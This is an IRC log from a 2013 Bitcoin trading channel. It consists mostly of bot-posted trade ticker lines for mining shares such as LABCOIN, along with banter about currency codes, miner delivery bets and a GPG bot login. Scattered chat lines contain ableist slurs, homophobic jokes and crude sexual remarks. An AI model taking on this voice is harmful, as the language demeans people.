Sep 20 00:51:56 Bitcoin Mining Hardware Mining by the GH - Homepage new products - Butterfly Labs Sep 20 00:51:56 :/ Sep 20 00:55:10 (question is, which town and coming from where is the pic) philly Sep 20 00:59:17 nop Sep 20 00:59:30 looks similar tho Sep 20 00:59:32 hrm Sep 20 01:03:55 [BTCTC] [S] [ACTIVEMINING] 526 @ 0.00221 = 1.1625 BTC [-] {3} Sep 20 01:04:56 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.812 = 3.624 BTC [-] Sep 20 01:04:56 [BTCTC] [S] [BASIC-MINING] 3 @ 0.12 = 0.36 BTC [+] Sep 20 01:05:57 [BTCTC] [S] [COGNITIVE] 2 @ 0.1652 = 0.3304 BTC [-] Sep 20 01:06:58 [BTCTC] [S] [LABCOIN] 4200 @ 0.00242076 = 10.1672 BTC [-] {8} Sep 20 01:06:58 [BTCTC] [S] [TAT.ASICMINER] 82 @ 0.01731865 = 1.4201 BTC [-] {8} Sep 20 01:07:49 ;;estimate Sep 20 01:07:50 Next difficulty estimate | 135770027.318 based on data since last change | 138834360.724 based on data for last three days Sep 20 01:08:35 Detroit? Sep 20 01:11:13 nop. Sep 20 01:11:54 ah well Sep 20 01:14:05 [BTCTC] [S] [TAT.ASICMINER] 30 @ 0.01721 = 0.5163 BTC [-] Sep 20 01:14:07 i don't think you can identify it if you've not been on the exact road Sep 20 01:14:13 but otherwise i think it's pretty obvious Sep 20 01:14:21 whats up everyone Sep 20 01:14:32 so like 0.1% odds or less i guess Sep 20 01:15:06 sup josh Sep 20 01:15:16 mjr_ not much, going to watch cocksucker blues with innocent girlies. Sep 20 01:15:17 are you a traitor yet? Sep 20 01:16:07 [BTCTC] [FN] [BTC-GOLD] 492 @ 0.00505192 = 2.4855 BTC [-] {8} Sep 20 01:16:16 hmm Sep 20 01:16:21 is that a new movie? Sep 20 01:16:33 i'm in panama and loving it Sep 20 01:19:38 sweet Sep 20 01:21:12 [BTCTC] [S] [LTC-ATF.B2] 20 @ 0.01148 = 0.2296 BTC [+] Sep 20 01:25:15 [BTCTC] [S] [ET.DIFF.LONG] 10 @ 0.01356899 = 0.1357 BTC [+] {3} Sep 20 01:26:20 http://www.zdnet.com/pay-heed-to-the-internets-third-wave-cows-of-disruption-7000020878/ Sep 20 01:26:23 interesting read Sep 20 01:26:26 Pay heed to the internet's Third Wave Cows of Disruption | ZDNet Sep 20 01:29:19 Duffer1: yoyoyo Sep 20 01:29:22 pm Sep 20 01:30:59 cows have been disrupting tech for a while actually Sep 20 01:31:18 dairy being one of the drivers of 'big data' from the outset Sep 20 01:31:57 we need more cows, these methane levels just arent cutting it, im cold. Sep 20 01:37:08 does bitfunders graph cause problems for other peoples browsers as well? everytime i try to change it it lags like hell then i get a stop script prompt from firefox Sep 20 01:37:29 hide that ish Sep 20 01:38:04 but i wanna look at it :s Sep 20 01:42:32 [BTCTC] [S] [PETA-MINE] 1 @ 0.645 BTC [-] Sep 20 01:45:35 [BTCTC] [S] [ACTIVEMINING] 265 @ 0.002357 = 0.6246 BTC [+] {3} Sep 20 01:48:18 so we have to start saying XBT rather than BTC? Sep 20 01:48:37 only hipsters say XBT Sep 20 01:48:38 [BTCTC] [S] [PETA-MINE] 1 @ 0.645 BTC [-] Sep 20 01:48:39 [BTCTC] [S] [LABCOIN] 625 @ 0.002421 = 1.5131 BTC [+] Sep 20 01:48:51 but i am a hipster Sep 20 01:49:03 i mean, i assumed we all were Sep 20 01:49:04 nah its how we'll discern wall st wanna-bes Sep 20 01:49:19 huh, hipsters are wallst wannabes? Sep 20 01:49:23 i just shaved my ironic neckbeard so, maybe Sep 20 01:50:10 i hope everyone uses xbt and when i add it to mt4 at some point, i call it BTC Sep 20 01:50:17 "B⃦ has been the standard currency sign for BTC for a long time." --https://en.bitcoin.it/wiki/Bitcoin_symbol What ass do people pull this shit from. Sep 20 01:50:40 [BTCTC] [S] [ACTIVEMINING] 272 @ 0.002357 = 0.6411 BTC [+] {3} Sep 20 01:50:41 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.852 BTC [+] Sep 20 01:50:50 is that the bloomberg symbol? Sep 20 01:51:10 didnt cut paste but its the double vertical bar through the B symbol Sep 20 01:51:11 i only see a box Sep 20 01:51:16 Bberg is just mimicing the iso Sep 20 01:51:38 is my fonts outta date or sumth? Sep 20 01:51:46 Mine looks silly too Sep 20 01:51:54 see tha link Sep 20 01:52:23 just use /b/ Sep 20 01:52:40 link shows funny box too Sep 20 01:52:43 [BTCTC] [S] [LABCOIN] 934 @ 0.00242 = 2.2603 BTC [-] Sep 20 01:52:50 /b/coin for /b/tards Sep 20 01:53:21 bittarded Sep 20 01:53:32 bitarded Sep 20 01:53:47 bitardus Sep 20 01:53:56 tardis* Sep 20 01:54:45 [HAVELOCK] [S] [HIM] 2 @ 0.18999 = 0.38 BTC [+] Sep 20 01:54:46 [BTCTC] [S] [LABCOIN] 5000 @ 0.0024145 = 12.0725 BTC [-] {2} Sep 20 01:54:46 [HAVELOCK] [S] [AM100] 20 @ 0.0168 = 0.336 BTC [-] Sep 20 01:57:48 [BTCTC] [FN] [DMS.PURCHASE] 1000 @ 0.009291 = 9.291 BTC [-] Sep 20 02:00:00 mmm 25 gigglebits of ios7 updates Sep 20 02:01:04 [BTCTC] [LABCOIN] 8700 @ 0.00240962 = 20.9637 BTC [-] {3} Sep 20 02:03:06 [BTCTC] [DMS.MINING] 1000 @ 0.00230077 = 2.3008 BTC [-] {8} Sep 20 02:04:07 [BTCTC] [LABCOIN] 1000 @ 0.0024 = 2.4 BTC [-] Sep 20 02:06:09 [BTCTC] [LABCOIN] 65 @ 0.0024 = 0.156 BTC [-] Sep 20 02:08:56 lol kraken, btc is xbt and ltc is ltc! Sep 20 02:09:24 dunno if these guys know what they are doing Sep 20 02:09:36 how did they come up with xbt anyways Sep 20 02:09:50 well, it is the standard of retards Sep 20 02:11:18 Duffer1 http://en.wikipedia.org/wiki/ISO_4217 Sep 20 02:12:23 some idiot put XBT inthere Sep 20 02:13:10 oh x = no country code then? Sep 20 02:14:09 THIS IS BAT COUNTRY! Sep 20 02:14:46 X is the internets Sep 20 02:14:57 short for xxx Sep 20 02:15:40 they put x in front cause its sounds more dope Sep 20 02:16:29 stands for Christ Sep 20 02:17:06 the preferred coin of Jesus Sep 20 02:17:19 [BTCTC] [FN] [DMS.SELLING] 1000 @ 0.00708693 = 7.0869 BTC [+] {6} Sep 20 02:17:35 hm Sep 20 02:27:58 i've seen xlt for litecoin somewhere Sep 20 02:28:05 cant remember Sep 20 02:29:04 sounds like a mcdonalds burger Sep 20 02:29:20 https://forum.litecoin.net/index.php?topic=5427.0 googled this.. Sep 20 02:29:25 Litecoin Association Meetings Talking Points, Notes and Log Sep 20 02:29:30 they even mimic btc foundation Sep 20 02:29:37 chicken hipsters Sep 20 02:30:24 lol at the log Sep 20 02:30:30 they sound very important Sep 20 02:30:59 like as much as us Sep 20 02:31:32 we dont organize Sep 20 02:31:40 or attempt to Sep 20 02:32:04 yeah, we kill solo ;) Sep 20 02:32:55 not sure if the Q got to you, but is there an RSS just for resolved bitbets? Sep 20 02:33:19 is on todo, early next week im out of time sry Sep 20 02:33:27 cool cool Sep 20 02:33:36 [HAVELOCK] [B] [XBOND] 150 @ 0.00116001 = 0.174 BTC [-] Sep 20 02:33:46 happy to see the new stuffs lately Sep 20 02:33:56 calculators and fancy assbottery Sep 20 02:34:00 kako is not dead, yet. Sep 20 02:36:19 "Department of Defense office manages to find a new fax machine to accept FOIA requests" Sep 20 02:40:43 [HAVELOCK] [B] [XBOND] 150 @ 0.00116 = 0.174 BTC [-] Sep 20 02:41:44 [BTCTC] [LABCOIN] 45953 @ 0.00227094 = 104.3565 BTC [-] {41} Sep 20 02:42:45 [BTCTC] [LABCOIN] 46421 @ 0.00220473 = 102.3458 BTC [-] {15} Sep 20 02:43:46 [BTCTC] [LABCOIN] 4000 @ 0.00216064 = 8.6426 BTC [-] {7} Sep 20 02:44:47 [BTCTC] [LABCOIN] 68964 @ 0.00208342 = 143.681 BTC [-] {65} Sep 20 02:45:11 nice Sep 20 02:45:40 dexx7, what hapnd! <@assbot> [BTCTC] [LABCOIN] 68964 @ 0.00208342 = 143.681 BTC [-] {65} Sep 20 02:45:53 zero news, lets dump a 150k shares! Sep 20 02:46:17 :o Sep 20 02:46:19 :D Sep 20 02:46:29 i have no idea Sep 20 02:46:41 lol Sep 20 02:46:41 wow Sep 20 02:47:00 all nice summed up :) Sep 20 02:47:05 and in 10min therell be 150k buys? Sep 20 02:47:14 someone added a zero to their sell order? :P Sep 20 02:47:20 is {65} the record? Sep 20 02:47:44 prolly Sep 20 02:47:44 !highscore << want! Sep 20 02:47:53 must track important records like that Sep 20 02:48:08 i like that idea dex Sep 20 02:48:13 !freehookers << want! Sep 20 02:48:18 but only mp gets that. Sep 20 02:48:27 hehe Sep 20 02:48:35 are they hookers if they are free? Sep 20 02:48:44 oh shit assbot is smart now? Sep 20 02:48:46 havent they lost enough? Sep 20 02:48:51 [HAVELOCK] [AM100] 321 @ 0.01615563 = 5.186 BTC [-] {13} Sep 20 02:49:52 [HAVELOCK] [HIM] 1 @ 0.18999 BTC [+] Sep 20 02:50:53 [BTCTC] [TAT.ASICMINER] 40 @ 0.01713624 = 0.6854 BTC [-] {3} Sep 20 02:50:53 [HAVELOCK] [AM100] 12 @ 0.016 = 0.192 BTC [-] Sep 20 02:56:59 [HAVELOCK] [LABCO] 100 @ 0.00233079 = 0.2331 BTC [-] {3} Sep 20 02:57:00 [BTCTC] [ASICMINER-PT] 1 @ 1.811 BTC [-] Sep 20 03:00:35 isn't a free hooker an oxymoron? Sep 20 03:01:00 rnd pic for the day http://25.media.tumblr.com/642a79ec66e060487838721cf58cf5ad/tumblr_mp4vg9Enqq1qjqxmoo1_r1_500.jpg Sep 20 03:01:12 and for jurov http://i.dailymail.co.uk/i/pix/2013/08/14/article-2393391-1B4AF46D000005DC-234_634x476.jpg Sep 20 03:01:47 lol Sep 20 03:03:12 mjr_ as much as free dentist Sep 20 03:03:17 ah he left Sep 20 03:04:16 free as in side stream crack smoke at stallmans house Sep 20 03:05:07 [HAVELOCK] [CBTC] 4506 @ 0.00040003 = 1.8025 BTC [-] Sep 20 03:05:42 chicken hipsters << totally. Sep 20 03:07:03 how come jurov gets much shittier pic ? Sep 20 03:08:05 http://24.media.tumblr.com/0197997c1882bff8df93ce3e46f8c3cd/tumblr_mq4421keel1qf809po1_1280.jpg Sep 20 03:08:25 kako has no nuance for this, he's forgiven Sep 20 03:08:42 lol Sep 20 03:08:45 and all together now : Sep 20 03:08:45 http://www.youtube.com/watch?v=01Z2Kj6wReg Sep 20 03:08:46 yea, much better Sep 20 03:08:46 Raw Chocolate Enemas (Part I of II), episode #328 - YouTube Sep 20 03:09:11 [HAVELOCK] [AM100] 20 @ 0.016 = 0.32 BTC [-] Sep 20 03:09:36 and also, cocksucker blues is NOT a new film. Sep 20 03:09:39 it's a very old one. Sep 20 03:10:44 (16:14) < kakobrekla> THIS IS BAT COUNTRY! << LOL Sep 20 03:12:14 [BTCTC] [LABCOIN] 450 @ 0.002278 = 1.0251 BTC [+] Sep 20 03:12:21 sorry jurov ill try to improve on it Sep 20 03:12:47 oh my Sep 20 03:13:12 this sounds dangerous. Sep 20 03:14:07 NO HOMO Sep 20 03:14:16 [BTCTC] [LABCOIN] 1432 @ 0.00228682 = 3.2747 BTC [+] {4} Sep 20 03:15:30 lol Sep 20 03:16:03 <[\\\]> its not gay unless the balls touch Sep 20 03:16:18 [BTCTC] [ASICMINER-PT] 1 @ 1.81 BTC [-] Sep 20 03:16:37 you said it Sep 20 03:17:34 dp is not gay ftr. Sep 20 03:19:21 [MPEX] [S.MPOE] 4928 @ 0.00092877 = 4.577 BTC [-] Sep 20 03:20:23 [BTCTC] [ASICMINER-PT] 6 @ 1.80016666 = 10.801 BTC [-] {2} Sep 20 03:32:39 aha, gavins haircut reminds me of spocks Sep 20 03:35:37 [HAVELOCK] [AM100] 14 @ 0.01599999 = 0.224 BTC [-] Sep 20 03:35:38 haha Sep 20 03:39:41 [BTCTC] [ASICMINER-PT] 1 @ 1.809 BTC [+] Sep 20 03:39:41 [HAVELOCK] [AM100] 29 @ 0.01599999 = 0.464 BTC [-] Sep 20 03:55:57 [BTCTC] [LABCOIN] 245 @ 0.002241 = 0.549 BTC [+] {3} Sep 20 04:10:11 [BTCTC] [LABCOIN] 15240 @ 0.00208475 = 31.7716 BTC [-] {18} Sep 20 04:11:12 [BTCTC] [LABCOIN] 80 @ 0.002243 = 0.1794 BTC [+] Sep 20 04:13:14 [BTCTC] [FN] [DMS.PURCHASE] 432 @ 0.009291 = 4.0137 BTC [-] Sep 20 04:20:21 [BTCTC] [LABCOIN] 105 @ 0.00203 = 0.2132 BTC [-] Sep 20 04:31:33 [BTCTC] [ASICMINER-PT] 1 @ 1.81 BTC [+] Sep 20 04:41:43 [BTCTC] [ASICMINER-PT] 3 @ 1.81 = 5.43 BTC [+] Sep 20 04:46:01 wat Sep 20 04:46:19 LC thread has 200 more pages than when I last looked at it Sep 20 04:46:40 they went full retard Sep 20 04:50:52 [BTCTC] [CIPHERMINE-PT] 28 @ 0.05774927 = 1.617 BTC [-] {3} Sep 20 04:50:53 no no Sep 20 04:51:44 it's like this since more than a week :p Sep 20 04:51:52 *for Sep 20 04:51:53 [BTCTC] [LABCOIN] 195 @ 0.0022707 = 0.4428 BTC [+] {2} Sep 20 04:54:56 [BTCTC] [COGNITIVE] 1 @ 0.1652 BTC [-] Sep 20 04:55:44 over 9000 weeks. Sep 20 04:56:09 http://bitbet.us/bet/253/sonys-playstation-4-will-ship-before-the-end/ Sep 20 04:56:14 BitBet - Sony's PlayStation 4 will ship before the end of 2013 Sep 20 04:56:19 ;;calc 2.4/0.04 Sep 20 04:56:19 60 Sep 20 04:56:32 sony is even less trusted than labcoin. Sep 20 04:59:34 knc is no scam, right? Sep 20 05:00:01 [HAVELOCK] [AM100] 105 @ 0.01599999 = 1.68 BTC [-] Sep 20 05:00:25 Who knows? I'm not sure of anything anymore. Sep 20 05:00:32 We would also like to take this opportunity to say that while we have remained as silent as possible on our simulations and only promised figures that we know we can meet. we will not down clock our chips to 400 we will release all our machines with the greatest hashing power we can. So yes the rumors are true Jupiter will be greater than 400 by a significant margin as a free gift from Sep 20 05:00:32 us to all our loyal customers. Sep 20 05:00:51 this sounds funny.. "yes the rumors are true" etc =D Sep 20 05:01:02 [HAVELOCK] [AM100] 18 @ 0.016 = 0.288 BTC [+] Sep 20 05:01:33 lol Sep 20 05:02:03 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 20 05:02:07 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 20 05:02:08 rated 3:2, but i have my doubts. Sep 20 05:03:17 do you think bets reflect the sentiment appropriately? Sep 20 05:03:36 my own opinion is that yes is overstated. Sep 20 05:03:50 then again, > 100 bets, i would guess it does reflect sentiment appropriately. Sep 20 05:08:08 [HAVELOCK] [VTX] 2 @ 0.5500003 = 1.1 BTC [-] Sep 20 05:08:09 [BTCTC] [LABCOIN] 125 @ 0.002065 = 0.2581 BTC [-] Sep 20 05:10:10 [HAVELOCK] [CFIG] 2 @ 0.13555 = 0.2711 BTC [-] Sep 20 05:11:11 [HAVELOCK] [AM100] 20 @ 0.016 = 0.32 BTC [+] Sep 20 05:13:13 [HAVELOCK] [CFIG] 6 @ 0.13500101 = 0.81 BTC [-] Sep 20 05:13:14 [BTCTC] [PETA-MINE] 13 @ 0.65 = 8.45 BTC [+] {2} Sep 20 05:16:16 [BTCTC] [LABCOIN] 200 @ 0.00215 = 0.43 BTC [+] Sep 20 05:21:21 [BTCTC] [FN] [DMS.SELLING] 70 @ 0.00686104 = 0.4803 BTC [-] {2} Sep 20 05:22:22 [BTCTC] [LABCOIN] 200 @ 0.00224 = 0.448 BTC [+] Sep 20 05:24:24 [BTCTC] [B] [CIPHERMINE.B1] 10 @ 0.01031 = 0.1031 BTC [-] Sep 20 05:25:26 [BTCTC] [LABCOIN] 60 @ 0.002236 = 0.1342 BTC [-] Sep 20 05:33:34 [HAVELOCK] [AM100] 109 @ 0.016 = 1.744 BTC [+] Sep 20 05:41:42 [BTCTC] [BTC-BOND] 400 @ 0.01031074 = 4.1243 BTC [+] {4} Sep 20 05:52:53 [BTCTC] [LABCOIN] 18228 @ 0.00205544 = 37.4666 BTC [-] {16} Sep 20 05:53:54 [BTCTC] [LABCOIN] 2081 @ 0.00200548 = 4.1734 BTC [-] {2} Sep 20 06:04:04 [BTCTC] [LABCOIN] 922 @ 0.002005 = 1.8486 BTC [-] {2} Sep 20 06:09:09 [BTCTC] [LABCOIN] 26996 @ 0.00190263 = 51.3634 BTC [-] {21} Sep 20 06:09:13 my dreams.. my future.. :( Sep 20 06:11:08 kids going to public school now? Sep 20 06:11:13 was that your dump dexx? Sep 20 06:11:22 if you dumped then i'd be scared Sep 20 06:11:36 haha :) no i'm just fooling around Sep 20 06:11:38 i'm not invested Sep 20 06:11:44 i see hehe Sep 20 06:12:12 [BTCTC] [LABCOIN] 4986 @ 0.0018538 = 9.243 BTC [-] {7} Sep 20 06:12:16 i only get in for a very short time Sep 20 06:12:18 theres always selling pics of stuff in your ass to mp Sep 20 06:12:57 full on labcoin panic time looks like Sep 20 06:13:13 [BTCTC] [LABCOIN] 61543 @ 0.00176446 = 108.5902 BTC [-] {39} Sep 20 06:13:16 it's imploding now Sep 20 06:13:59 hmm burnside planning to cut and run Sep 20 06:14:12 requiring a public bailout address Sep 20 06:18:18 [BTCTC] [LABCOIN] 452 @ 0.00199813 = 0.9032 BTC [+] {2} Sep 20 06:19:19 [HAVELOCK] [B] [XBOND] 5721 @ 0.0013882 = 7.9419 BTC [+] {9} Sep 20 06:21:21 [BTCTC] [ACTIVEMINING] 300 @ 0.002349 = 0.7047 BTC [+] Sep 20 06:22:22 [BTCTC] [ACTIVEMINING] 2760 @ 0.00221238 = 6.1062 BTC [-] {6} Sep 20 06:30:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.0173 = 0.173 BTC [-] Sep 20 06:33:33 [BTCTC] [TAT.ASICMINER] 38 @ 0.01698 = 0.6452 BTC [-] {2} Sep 20 06:35:10 ;;ident dexx7_ Sep 20 06:35:11 Nick 'dexx7_', with hostmask 'dexX7_!dexX7@unaffiliated/dexx7', is not identified. Sep 20 06:35:35 [BTCTC] [TAT.ASICMINER] 37 @ 0.01689 = 0.6249 BTC [-] Sep 20 06:36:13 w8 Sep 20 06:36:36 [BTCTC] [TAT.ASICMINER] 33 @ 0.01689 = 0.5574 BTC [-] Sep 20 06:36:49 never can be too careful :P Sep 20 06:37:37 [BTCTC] [TAT.ASICMINER] 25 @ 0.01689 = 0.4223 BTC [-] Sep 20 06:37:46 ;;gpg everify Sep 20 06:37:46 (gpg everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Sep 20 06:37:58 ;;gpg eauth Sep 20 06:37:58 (gpg eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Sep 20 06:38:04 ;;gpg eauth dexX7 Sep 20 06:38:04 Request successful for user dexX7, hostmask dexX7_!dexX7@unaffiliated/dexx7. Get your encrypted OTP from http://bitcoin-otc.com/otps/7675E31CF5719832 Sep 20 06:38:38 [MPEX] [S.MPOE] 7743 @ 0.00093 = 7.201 BTC [+] Sep 20 06:39:35 oh i see your connection timeout Sep 20 06:39:38 [BTCTC] [TAT.ASICMINER] 12 @ 0.01689 = 0.2027 BTC [-] {2} Sep 20 06:40:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.01689 = 0.1689 BTC [-] Sep 20 06:42:42 [BTCTC] [TAT.ASICMINER] 30 @ 0.01686 = 0.5058 BTC [-] Sep 20 06:44:04 ;;gpg everify freenode:#bitcoin-otc:b8a3fa4bb789c1c01f157f368f791d40b3334c11f189ae3f7b95e5ed Sep 20 06:44:05 You are now authenticated for user dexX7 with key 7675E31CF5719832 Sep 20 06:46:46 [BTCTC] [LABCOIN] 15392 @ 0.00182284 = 28.0572 BTC [-] {21} Sep 20 06:47:47 [BTCTC] [LABCOIN] 20683 @ 0.00174213 = 36.0325 BTC [-] {12} Sep 20 06:48:48 [BTCTC] [LABCOIN] 2971 @ 0.001661 = 4.9348 BTC [-] Sep 20 06:50:51 [BTCTC] [LABCOIN] 8392 @ 0.00167956 = 14.0949 BTC [+] {4} Sep 20 06:51:51 [BTCTC] [LABCOIN] 2420 @ 0.0016606 = 4.0187 BTC [-] {6} Sep 20 06:52:52 [BTCTC] [ASICMINER-PT] 1 @ 1.81 BTC [+] Sep 20 06:52:52 [BTCTC] [LABCOIN] 10000 @ 0.00165151 = 16.5151 BTC [-] {6} Sep 20 06:53:53 [BTCTC] [TAT.ASICMINER] 100 @ 0.01655568 = 1.6556 BTC [-] {10} Sep 20 06:54:54 [BTCTC] [LABCOIN] 1000 @ 0.00166 = 1.66 BTC [+] Sep 20 06:55:55 [BTCTC] [LABCOIN] 700 @ 0.001799 = 1.2593 BTC [+] Sep 20 06:58:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.01650759 = 0.8254 BTC [-] {5} Sep 20 06:58:58 [BTCTC] [LABCOIN] 1000 @ 0.00179782 = 1.7978 BTC [-] {2} Sep 20 06:59:38 =whats up [7] Sep 20 07:01:00 [BTCTC] [LABCOIN] 394 @ 0.00184196 = 0.7257 BTC [+] {3} Sep 20 07:01:33 not labcoin :P Sep 20 07:02:01 [BTCTC] [LABCOIN] 486 @ 0.001843 = 0.8957 BTC [+] Sep 20 07:03:02 [BTCTC] [TAT.ASICMINER] 96 @ 0.01634478 = 1.5691 BTC [-] {7} Sep 20 07:04:03 [BTCTC] [LABCOIN] 237 @ 0.001798 = 0.4261 BTC [-] Sep 20 07:09:08 [BTCTC] [LABCOIN] 392 @ 0.001901 = 0.7452 BTC [+] Sep 20 07:12:11 [BTCTC] [LABCOIN] 12631 @ 0.00168362 = 21.2658 BTC [-] {8} Sep 20 07:13:12 [HAVELOCK] [B] [XBOND] 1050 @ 0.0013999 = 1.4699 BTC [+] **** BEGIN LOGGING AT Fri Sep 20 07:18:13 2013 Sep 20 07:20:17 [BTCTC] [LABCOIN] 1000 @ 0.00189507 = 1.8951 BTC [+] {3} Sep 20 07:21:18 [BTCTC] [LABCOIN] 1013 @ 0.0018897 = 1.9143 BTC [-] {4} Sep 20 07:22:19 [BTCTC] [LABCOIN] 557 @ 0.00189629 = 1.0562 BTC [+] {2} Sep 20 07:27:24 [BTCTC] [LABCOIN] 392 @ 0.001885 = 0.7389 BTC [-] Sep 20 07:27:24 [BTCTC] [ASICMINER-PT] 1 @ 1.81 BTC [+] Sep 20 07:37:34 [HAVELOCK] [AM100] 71 @ 0.01580591 = 1.1222 BTC [-] {4} Sep 20 07:50:46 [BTCTC] [CIPHERMINE-PT] 2 @ 0.0628 = 0.1256 BTC [+] Sep 20 07:57:53 [BTCTC] [LABCOIN] 150 @ 0.001841 = 0.2762 BTC [-] Sep 20 07:58:54 [BTCTC] [LABCOIN] 645 @ 0.00184081 = 1.1873 BTC [-] {2} Sep 20 08:01:57 [BTCTC] [LABCOIN] 392 @ 0.001889 = 0.7405 BTC [+] Sep 20 08:03:59 [BTCTC] [LABCOIN] 392 @ 0.00189 = 0.7409 BTC [+] Sep 20 08:05:00 [MPEX] [S.MPOE] 7850 @ 0.00093447 = 7.3356 BTC [+] Sep 20 08:06:01 [BTCTC] [LABCOIN] 1686 @ 0.00189194 = 3.1898 BTC [+] {4} Sep 20 08:07:02 [BTCTC] [LABCOIN] 784 @ 0.001895 = 1.4857 BTC [+] {2} Sep 20 08:10:05 [HAVELOCK] [AM100] 7 @ 0.01649999 = 0.1155 BTC [+] Sep 20 08:11:06 [BTCTC] [LABCOIN] 200 @ 0.001899 = 0.3798 BTC [+] Sep 20 08:11:07 [HAVELOCK] [AM100] 7 @ 0.0165 = 0.1155 BTC [+] Sep 20 08:13:08 [BTCTC] [TAT.ASICMINER] 30 @ 0.01687933 = 0.5064 BTC [+] {4} Sep 20 08:14:09 [BTCTC] [LABCOIN] 300 @ 0.001899 = 0.5697 BTC [+] Sep 20 08:16:12 [BTCTC] [LABCOIN] 200 @ 0.001899 = 0.3798 BTC [+] Sep 20 08:20:19 ;;ticker Sep 20 08:20:20 MtGox BTCUSD ticker | Best bid: 135.60004, Best ask: 135.98999, Bid-ask spread: 0.38995, Last trade: 135.60002, 24 hour volume: 20085.83043878, 24 hour low: 131.14000, 24 hour high: 140.59000, 24 hour vwap: 135.92191 Sep 20 08:20:22 ;;bcstats Sep 20 08:20:24 ;;nethash Sep 20 08:20:24 Current Blocks: 258960 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 1103 blocks | Next Difficulty In About: 5 days, 18 hours, 35 minutes, and 48 seconds | Next Difficulty Estimate: 136457269.03 | Estimated Percent Change: 21.15691 Sep 20 08:20:25 993830.229432 Sep 20 08:20:39 ;;estimate Sep 20 08:20:40 Next difficulty estimate | 136457269.03 based on data since last change | 138834360.724 based on data for last three days Sep 20 08:22:18 [BTCTC] [LABCOIN] 250 @ 0.001899 = 0.4748 BTC [+] Sep 20 08:25:21 [BTCTC] [ASICMINER-PT] 1 @ 1.81 BTC [+] Sep 20 08:27:37 http://www.theblaze.com/stories/2013/09/19/scientists-very-very-confident-theyve-found-extraterrestrial-life-see-what-it-looks-like/ Sep 20 08:29:55 “Of course it will be argued that there must be an, as yet, unknown mechanism for transferring large particles from Earth to the high stratosphere, but we stand by our conclusions,” Wainwright said. Sep 20 08:30:12 apparently wainwright hasn't read the scientific consensus re cfc gases :D Sep 20 08:32:28 [BTCTC] [LABCOIN] 1666 @ 0.0018996 = 3.1647 BTC [+] {2} Sep 20 08:33:21 quickly looking at it I thought theblaze was trying to replace onion news Sep 20 08:35:32 "New textbooks will have to be written!" and "The group’s findings were published in the Journal of Cosmology. We should point out, the credibility of the journal has been called into question before." were the culprits Sep 20 08:43:01 its pretty thin claiming species not found on earthmeans anything given we havent found half the species on earth Sep 20 08:43:42 I, for one, welcome our new microbacterial overlords Sep 20 08:44:35 lol Sep 20 08:44:59 it only interests me because it contradicts the "well mixed" stratosphere bs. Sep 20 08:45:41 [BTCTC] [LABCOIN] 2327 @ 0.00180312 = 4.1959 BTC [-] {6} Sep 20 08:46:42 [BTCTC] [ACTIVEMINING] 675 @ 0.00231912 = 1.5654 BTC [+] {2} Sep 20 08:51:47 [BTCTC] [LABCOIN] 2796 @ 0.00180479 = 5.0462 BTC [+] {5} Sep 20 08:53:49 [BTCTC] [LABCOIN] 522 @ 0.00192468 = 1.0047 BTC [+] {3} Sep 20 08:54:24 but do you actually believe in that experiment ? why a good research group would publish their findings in a journal of negative credibility ? Sep 20 08:54:50 [BTCTC] [LABCOIN] 269 @ 0.001929 = 0.5189 BTC [+] Sep 20 08:55:51 [BTCTC] [ACTIVEMINING] 937 @ 0.00220047 = 2.0618 BTC [-] {2} Sep 20 08:56:52 [BTCTC] [LABCOIN] 1000 @ 0.00195311 = 1.9531 BTC [+] {5} Sep 20 08:58:54 [BTCTC] [LABCOIN] 3833 @ 0.00198134 = 7.5945 BTC [+] {5} Sep 20 08:59:55 [BTCTC] [ACTIVEMINING] 1665 @ 0.00213025 = 3.5469 BTC [-] {11} Sep 20 09:00:56 [BTCTC] [LABCOIN] 1800 @ 0.00205957 = 3.7072 BTC [+] {2} Sep 20 09:02:58 [BTCTC] [ACTIVEMINING] 180 @ 0.0020844 = 0.3752 BTC [-] {3} Sep 20 09:06:10 knotwork nah, it's just for the lolz. Sep 20 09:06:27 i mean knowitnothing Sep 20 09:09:04 [BTCTC] [LABCOIN] 115 @ 0.00205443 = 0.2363 BTC [-] {2} Sep 20 09:19:14 [BTCTC] [LABCOIN] 7218 @ 0.00204119 = 14.7333 BTC [-] {4} Sep 20 09:32:26 [HAVELOCK] [AM100] 50 @ 0.016 = 0.8 BTC [-] Sep 20 09:32:28 [BTCTC] [COGNITIVE] 10 @ 0.16503 = 1.6503 BTC [-] {3} Sep 20 09:40:34 [BTCTC] [LABCOIN] 198 @ 0.00206 = 0.4079 BTC [+] Sep 20 09:40:35 [HAVELOCK] [AM100] 101 @ 0.01658997 = 1.6756 BTC [+] {2} Sep 20 09:44:38 [BTCTC] [LABCOIN] 1000 @ 0.0028 = 2.8 BTC [+] Sep 20 09:46:41 [BTCTC] [BASIC-MINING] 1 @ 0.115 BTC [-] Sep 20 09:51:46 [BTCTC] [ACTIVEMINING] 2429 @ 0.00205524 = 4.9922 BTC [-] {6} Sep 20 09:54:49 [BTCTC] [LABCOIN] 300 @ 0.0021 = 0.63 BTC [-] Sep 20 09:55:50 [BTCTC] [LABCOIN] 160 @ 0.00213875 = 0.3422 BTC [+] {2} Sep 20 09:56:51 [BTCTC] [LABCOIN] 248 @ 0.00215011 = 0.5332 BTC [+] {3} Sep 20 09:59:54 [BTCTC] [LABCOIN] 492 @ 0.00222841 = 1.0964 BTC [+] {5} Sep 20 10:00:56 [HAVELOCK] [AM100] 25 @ 0.01659 = 0.4148 BTC [+] Sep 20 10:04:59 [BTCTC] [LABCOIN] 243 @ 0.00215033 = 0.5225 BTC [-] {5} Sep 20 10:14:08 [BTCTC] [LABCOIN] 11750 @ 0.00183036 = 21.5067 BTC [-] {28} Sep 20 10:15:09 [BTCTC] [LABCOIN] 72634 @ 0.00171031 = 124.2267 BTC [-] {58} Sep 20 10:16:10 [BTCTC] [LABCOIN] 18250 @ 0.0018 